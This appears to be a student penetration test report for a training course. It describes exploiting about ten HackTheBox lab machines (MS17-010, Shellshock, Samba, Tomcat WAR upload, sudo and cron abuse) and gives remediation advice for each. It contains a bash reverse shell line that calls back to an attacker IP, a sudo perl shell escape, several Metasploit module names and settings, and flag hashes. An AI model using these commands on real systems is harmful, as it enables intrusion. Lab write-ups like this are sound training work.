Penetration Test Report for

Internal Lab and Exam

v.1.0

[email protected]

Gilo Yosef
Copyright © 2021 ITSafe Ltd. All rights reserved.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from ITSAFE Cyber College.

Table of Contents

1.0 ITSafe Penetration Project Reports 4

1 | Page
 1.1 Introduction 4
1.2 Objective 4
1.3 Requirements 4
2.0 High-Level Summary 5
2.1 Recommendations 6
3.0 Methodologies 6
3.1 Information Gathering 6
3.2 Penetration 7
System IP: 10.10.10.4 7
Service Enumeration 7
Privilege Escalation 7
System IP: 10.10.10.40 16
Service Enumeration 16
Privilege Escalation 16
System IP: 10.10.10.5 18
Service Enumeration 18
Privilege Escalation 18
System IP: 10.10.10.95 20
Service Enumeration 20
Privilege Escalation 20
System IP: 10.10.10.8 22
Service Enumeration 22
Privilege Escalation 22
System IP:10.10.10.14 23
Service Enumeration 23
Privilege Escalation 23
4.0 Additional Items 24
2 | Page
Appendix 1 - Proof and Local Contents: 24

3 | Page
1.0 ITSafe Penetration Project Reports

1.1 Introduction

The ITSAFE Lab penetration test report contains all efforts that were conducted in order to pass the
ITSAFE Project Lab. This report will be graded from a standpoint of correctness and fullness to all
aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of
penetration testing methodologies as well as the technical knowledge to pass the qualifications for the
ITSAFE Certified Professional.

1.2 Objective

The objective of this assessment is to perform an internal penetration test against the ITSAFE Lab
network. The student is tasked with following a methodical approach in obtaining access to the objective
goals. This test should simulate an actual penetration test and how you would start from beginning to end,
including the overall report. An example page has already been created for you at the latter portions of
this document that should give you ample information on what is expected to pass this course. Use the
sample report as a guideline to get you through the reporting.

1.3 Requirements

The student will be required to fill out this penetration testing report fully and to include the following
sections:

● Overall High-Level Summary and Recommendations (non-technical)

● Methodology walkthrough and detailed outline of steps taken
● Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
● Any additional items that were not included

4 | Page
2.0 High-Level Summary

I was tasked with performing an internal penetration test towards ITSAFE Project. An internal penetration
test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks,
similar to those of a hacker and attempt to infiltrate HackTheBox\VulnHub internal Lab systems –My
overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the
findings back to ITSAFE.

When performing the internal penetration test, there were several alarming vulnerabilities that were
identified on Offensive Security’s network. When performing the attacks, I was able to gain access to
multiple machines, primarily due to outdated patches and poor security configurations. During the
testing, I had administrative level access to multiple systems. All systems were successfully exploited and
access granted. These systems as well as a brief description on how access was obtained are listed below:

● 10.10.10.4 (Legacy) - Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
● 10.10.10.56 (Shocker) - Apache mod_cgi Bash Environment Variable Code Injection
(Shellshock)
● 10.10.10.3 (Lame) – outdated samba version – Remote code execution
● 10.10.10.68 (Bashed) - This machine involved exploiting a PHP bash shell to gain initial access,
misconfigured Sudo rules  to escalate to the “scriptmanager” user and a cron job to escalate to
root.
● 10.10.10.75 (Nibbles) – Arbitrary File Upload
● 10.10.10.40 (Blue) – MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
● 10.10.10.5 (Devel) - FTP login enabled, Remote File Execution
● 10.10.10.95 (Jerry) – Arbitrary File Upload
● 10.10.10.8 (Optimum) – Remote code execution
● 10.10.10.14 (Grandpa) – Buffer Overflow

5 | Page
2.1 Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot
exploit these systems in the future. One thing to remember is that these systems require frequent patching
and once patched, should remain on a regular patch program to protect additional vulnerabilities that are
discovered at a later date.

3.0 Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how well
the HackTheBox\VulnHub environments is secured. Below is a breakout of how I was able to identify
and exploit the variety of systems and includes all individual vulnerabilities found.

3.1 Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration
test. During this penetration test, I was tasked with exploiting the Lab network. The specific IP addresses
were:

Lab Network

● 10.10.10.4 ● 10.10.10.40
● 10.10.10.56 ● 10.10.10.5
● 10.10.10.3 ● 10.10.10.95
● 10.10.10.68 ● 10.10.10.8
● 10.10.10.75 ● 10.10.10.14

6 | Page
7 | Page
3.2 Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, I was able to successfully gain access to 10.10.10.4 out of the 10.10.14.15
systems.

System IP: 10.10.10.4

Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what
services are alive on a system or systems. This is valuable for an attacker as it provides detailed
information on potential attack vectors into a system. Understanding what applications are running on the
system gives an attacker needed information before performing the actual penetration test. In some cases,
some ports may not be listed.

Server IP Address Ports Open

10.10.10.4 TCP: 135, 139, 445

UDP:

8 | Page
Nmap Scan Results:

9 | Page
Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010).

I used Metasploit to gain access via exploit/windows/smb/ms17_010_psexec

Vulnerability Explanation: Microsoft Security Bulletin MS17-010 was published last March 14, 2017 to
address multiple vulnerabilities in Microsoft Server Message Block 1.0 (SMBv1). The most severe of the
vulnerabilities could allow remote code execution (RCE).

Vulnerability Fix: Security Update for Microsoft Windows SMB Server (4013389), Published:
March 14, 2017

Severity: Critical

10 | Page
Initial Shell Screenshot:

Privilege Escalation
Gained admin privileges straight from this exploit (NT AUTHORITY\SYSTEM

11 | Page
System IP: 10.10.10.56

Service Enumeration
Dirb http://10.10.10.56/cgi-bin -X .sh found a suspicious file path named user.sh

Server IP Address Ports Open

12 | Page
 10.10.10.56 TCP: 80, 2222

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

I used exploit multi/http/apache_mod_cgi_bash_env_exec module on metasploite

Vulnerability Explanation: Shellshock is a critical bug in Bash versions 1.0.3 - 4.3 that can enable an
attacker to execute arbitrary commands.

13 | Page
Vulnerability Fix: The easiest way to fix the vulnerability is to use your default package manager to
update the version of Bash. The following subsections cover updating Bash on various Linux
distributions, including Ubuntu, Debian, CentOS, Red Hat, and Fedora.

Severity: Critical

Initial Shell Screenshot:

Privilege Escalation
To gain root I simply used this command sudo perl -e 'exec "/bin/sh";'

14 | Page
Vulnerability Exploited:

Vulnerability Explanation: We can execute Perl as root user without any password . And -e means that
it allows you to define Perl code to be executed by the compiler ,And exec is like a function in Perl which
allows us to run /bin/bash

Vulnerability Fix: Reduce the information leaked by applications, remove complier or restrict
access to them, apply linux updates and patches, run file integrity monitoring software, perform
system auditing, privilege escalation checkers like LinEnum/ unix-privesc-check to perform
enumeration and check for possible linux privilege escalation options and to gather information
and determine possible attacks.

Severity: High

Exploit Code:

Proof Screenshot Here:

System IP 10.10.10.3

Service Enumeration

Server IP Address Ports Open

15 | Page
 10.10.10.3 TCP: 21, 22, 139, 445,3632

UDP:

Nmap Scan Results

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from

Vulnerability Explanation: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote
attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function,

16 | Page
when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute
commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share
management.

Vulnerability Fix: A patch against Samba 3.0.24 has been posted at

http://www.samba.org/samba/security/

Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

I used a script from github to gain this shell, afterwards I found a way to gain a reverse-shell via
Metasploit with this module exploit(multi/samba/usermap_script).

17 | Page
Privilege Escalation
Straight root privileges

Vulnerability Exploited:

Vulnerability Explanation:

Vulnerability Fix: A patch against Samba 3.0.24 has been posted at

http://www.samba.org/samba/security/

Severity: Critical

Proof Screenshot Here:

18 | Page
19 | Page
System IP: 10.10.10.68

Service Enumeration

Server IP Address Ports Open

10.10.10.68 TCP: 80

UDP:

Nmap Scan Results:

involved exploiting a PHP bash shell to gain initial access, misconfigured Sudo rules.

Vulnerability Explanation: After enumeration I’ve found /dev/ path folder that gain me a php bash
shell, I escalated to root because a misconfigured sudo rules to escalate to the scriptmanager user
and cron job to escalate to root.

Vulnerability Fix: Installing an OS updates, changing the Sudo configuration & application
configuration and installing an application patch.

20 | Page
Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
misconfigured Sudo rules to escalate to the “scriptmanager” user and a cron job to escalate to root.

Vulnerability Exploited: I had access to run sudo commands as scriptmanager user, I ran the command
“sudo -u scriptmanager /bin/bash”.

Afterwards I’ve found 2 interesting files on Script folder,

There is a simple script in ‘test.py’ which writes output on file ‘test.txt’. One more interesting thing we
got is that creation time of file test.txt is keep updating to the latest time. This mean there is a cron job is
running which runs test.py script automatically. If we replace the test.py file with our test.py file
containing reverse shell code and check, might we can get reverse shell of root.
In my local machine I created a script on python named also test.py, I opened a web server where I saved
the test.py file and then, I removed the original test.py file and I used wget to download my reverse shell
21 | Page
python script and change the file permissions with chmod command. Afterwards I opened a new listener
on the same port as the python script, I waited a minute, and I got root user access

Vulnerability Explanation:

Vulnerability Fix: Installing an OS updates, changing the Sudo configuration & application
configuration and installing an application patch.

Severity: Critical

Proof Screenshot Here:

System IP: 10.10.10.75

Service Enumeration

22 | Page
 Server IP Address Ports Open

10.10.10.75 TCP: 22, 80

UDP:

Nmap Scan Results:

Nmap scan result found 2 open ports, 22 and 80.

I started the enumeration on port 80 and I gained a root permission in the end.

I located a path named /nibbleblog/ and after more enumeration I succeed to find more paths via
dirb,

I located the admin.php path and successfully logged in due a weak password.

Then I uploaded my trojan to the web server and I gained a reverse shell.

Vulnerability Explanation: An arbitrary file upload vulnerability is a type of security flaw that allows an
attacker to upload malicious files onto a server. This can be done by exploiting a vulnerability in a web

23 | Page
application that doesn't properly validate the file type or by tricking the user into uploading a malicious
file.

Vulnerability Fix: -Take the whitelist approach to accept only a certain file extension. It can reduce the
risk involved with uncommon or unknown extensions.

Verify the files downloaded from the internet just like direct uploads. It helps to prevent arbitrary file
upload vulnerabilities. The downloaded files from the internet or uploaded directly by users should be
stored in a location that is not publicly accessible.

Restrict the user base to authenticate users so that the files they upload would be authorized easily. It
reduces the chance of random or unauthorized users uploading files to your website.

Prefer using the files downloaded from the application rather than from the web server directly.

Severity: Critical

Proof of Concept Code Here: PFA nibbles walkthrough file

Initial Shell Screenshot:

Privilege Escalation
I found that monitor.sh uses root permission, I edited it to a reverse shell script and I gained a root
access

Vulnerability Exploited: I removed the original monitor.sh file and I used WGET to transfer the
monitor.sh file I created on my local machine, I changed its permissions so ill be able to execute.

24 | Page
Afterwards I opened a listener on my local machine with Netcat and then I used the sudo command with
the full file path name to gain a reverse shell.

Vulnerability Explanation: I could sudo without supplying a password

Vulnerability Fix: Configuring the sudo permissions

Severity: High

Exploit Code: #!/bin/bash

bash -i >& /dev/tcp/10.10.14.15/1234 0>&1

Proof Screenshot Here:

25 | Page
Proof.txt Contents:

26 | Page
System IP: 10.10.10.40

Service Enumeration

Server IP Address Ports Open

10.10.10.40 TCP: 135,139.445.49152.49153,49154,49155,

49156,49157

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from
27 | Page
Vulnerability Explanation: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Vulnerability Fix: Microsoft released in March 14 th 2017 a security update for Microsoft Windows SMB
Server, The security update addresses the vulnerabilities by correcting how SMBv1 handles specially
crafted requests.

Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
This exploit gained access as NT-AUTHORITY\SYSTEM and a full control of the kernrel in ring 0

Vulnerability Fix: Microsoft released in March 14 th 2017 a security update for Microsoft Windows SMB
Server, The security update addresses the vulnerabilities by correcting how SMBv1 handles specially
crafted requests.

Severity: Critical

28 | Page
Exploit Code:

Proof Screenshot Here:

Proof.txt Contents:

29 | Page
System IP: 10.10.10.5

Service Enumeration

Server IP Address Ports Open

10.10.10.5 TCP: 21, 80

UDP:

Nmap Scan Results:

Port 80 is open with Microsoft IIS on it.

Port 21 FTP is also open.

Vulnerability Explanation: aspx trojan file has been uploaded, afterwards I opened the file path on
the browser meanwhile listening on Metasploit.

30 | Page
Vulnerability Fix: Anonymous FTP login must be disable.

Anonymous FTP is disabled by default for the security of your account. We do not recommend using
anonymous FTP because it allows any person to access FTP without identifying themselves, it is a
security risk

Severity: High

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
Vulnerability Exploited:

I used post(multi/recon/local_exploit_suggester) and succeed to gain admin privileges with exploit

windows/local/ms13_053_schlamperei.

Vulnerability Fix: In July 09th 2013 Microsoft released security update for this vulnerability,

This security update resolves two publicly disclosed and six privately reported vulnerabilities in
Microsoft Windows. The most severe vulnerability could allow remote code execution if a user views
shared content that embeds TrueType font files. An attacker who successfully exploited this vulnerability
could take complete control of an affected system.

Severity: High

Exploit Code:

31 | Page
Proof Screenshot Here:

Proof.txt Contents:

User’s flag

Root’s flag

32 | Page
System IP: 10.10.10.95

Service Enumeration

Server IP Address Ports Open

10.10.10.95 TCP: 8080

UDP:

Nmap Scan Results:

After open in browser the following URL (http://10.10.10.95:8080) and conrfirming that the Tomcat
server is accessible, I noticed on the ‘Manager App’ portal.

This portal is password protected, after trying default tomcat password, but I was able to see it on the
“Authentication Denied” page due a developer mistake.

Vulnerability Explanation: Since there is an option to upload WAR files I created a WAR trojan file
with msfvenom named jerry.war, I created a listener and opened the torjan WAR file and I received a
Reverse Shell

33 | Page
Vulnerability Fix: Using a strong password to avoid from hackers getting access with defaults
passwords.

Keep the server updated.

Severity: High

Proof of Concept Code Here:

Initial Shell Screenshot:

34 | Page
 Privileg
e Escalation

Root flag has been found.

35 | Page
System IP: 10.10.10.8

Service Enumeration

Server IP Address Ports Open

10.10.10.8 TCP: 80

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from- found port 80 is open with vulnerable
HttpFileServer version.

36 | Page
Vulnerability Explanation: A remote, unauthenticated user may be able to run arbitrary operating
system commands on the server.

Vulnerability Fix: This issue is addressed in HFS version 2.3c and later.

Severity: Critical

Proof of Concept Code Here: I used the (windows/http/rejetto_hfs_exec) module on Metasploit.

Initial Shell Screenshot:

Privilege Escalation
For the PE I used the post(multi/recon/local_exploit_suggester) module on Metasploit.

exploit/windows/local/ms16_032_secondary_logon_handle_privesc module gained me a root access.

37 | Page
Vulnerability Exploited: The remote Windows host is affected by an elevation of privilege vulnerability
in the Windows Secondary Logon Service due to improper management of request handles in memory.
An authenticated, remote attacker can exploit this, via a specially crafted application, to elevate
privileges, allowing the execution of arbitrary code.

Vulnerability Explanation:

Vulnerability Fix: Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012,
8.1, RT 8.1, 2012 R2, and 10.

Severity:

Exploit Code: I used exploit(windows/local/ms16_032_secondary_logon_handle_privesc) module on

Metasploit. I was setting the session into the module, and I gained a root access

Proof Screenshot Here:

38 | Page
Proof.txt Contents: PFA the walkthrough file.

use (windows/local/ms16_032_secondary_logon_handle_prives)

set session 1

set lhost 10.10.14.10

exploit

System IP: 10.10.10.14

Service Enumeration

Server IP Address Ports Open

10.10.10.14 TCP: 80

UDP:

Nmap Scan Results:

39 | Page
Nmap result found a vulnerable Microsoft IIS 6.0 version.

Vulnerability Explanation: This is a typical buffer overflow vulnerability . The affected system reported
(by the researcher) is Windows 2003 and IIS version 6. The vulnerability could be exploited with an
overly large ‘IF’ header in the ‘PROPFIND’ request with at least two http resource in the IF header.  If
successfully exploited, this vulnerability could lead to remote code execution. Sometimes, an
unsuccessful attack could still lead to denial-of-service conditions.

Vulnerability Fix: IIS 6.0 was included with Windows Server 2003; unfortunately, Microsoft isn't
supporting and won't be patching the old OS version anymore. To mitigate the risk, disabling the
WebDAV service on the vulnerable IIS 6.0 installation is recommended. Newer versions of Windows
Server shipped with newer versions of IIS are not affected by this vulnerability.

Severity: Critical

Proof of Concept Code Here:

40 | Page
Privilege Escalation
For the Privilege Escalation I used the Suggester ((multi/recon/local_exploit_suggester) module on
Metasploit, after trying some modules offered by the suggester, I gained a root access with
exploit(windows/local/ms10_015_kitrap0d) module

Vulnerability Explanation: This module will create a new session with SYSTEM privileges via the
KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not
run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

Vulnerability Fix: Microsoft released on February 09th 2010, an important update to fix this
vulnerability.

This security update resolves one publicly disclosed and one privately reported vulnerability in
Microsoft Windows

This security update is rated Important for all supported editions of Microsoft Windows 2000,
Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 for
32-bit Systems. For more information, see the subsection, Affected and Non-Affected Software, in
this section.

The following update addresses the vulnerabilities by ensuring that the Windows Kernel handles
exceptions properly.

Severity: Critical

Exploit Code: exploit/windows/local/ms10_015_kitrap0d module on Metasploit

Proof Screenshot Here:

Proof.txt Contents:

41 | Page
4.0 Additional Items

Appendix 1 - Proof and Local Contents:

IP (Hostname) Proof.txt Contents

10.10.10.4 (Legacy) 993442d258b0e0ec917cae9e695d5713

10.10.01.56 (Shocker) 52c2715605d70c7619030560dc1ca467

10.10.10.3 (Lame) e6778635918aa42689951738d5fdddab

10.10.10.68 (Bashed) d032d3cafb6276834f1dc8fdf1deb840

10.10.10.75 (Nibbles) e7e3a76cbcabbde3a4e7624cea9eb691

10.10.10.40 (Blue) 2c9eb8dd2d4752ae890cfb535977ffaf

10.10.10.5 (Devel) 5b65556f2792e9ce33f01776839d639f

10.10.10.95 (Jerry) 04a8b36e1545a455393d067e772fe90e

10.10.10.8 (Optimum) 51ed1b36553c8461f4552c2e92b3eeed

10.10.10.14 (Grandpa) 9359e905a2c35f861f6a57cecf28bb7b

42 | Page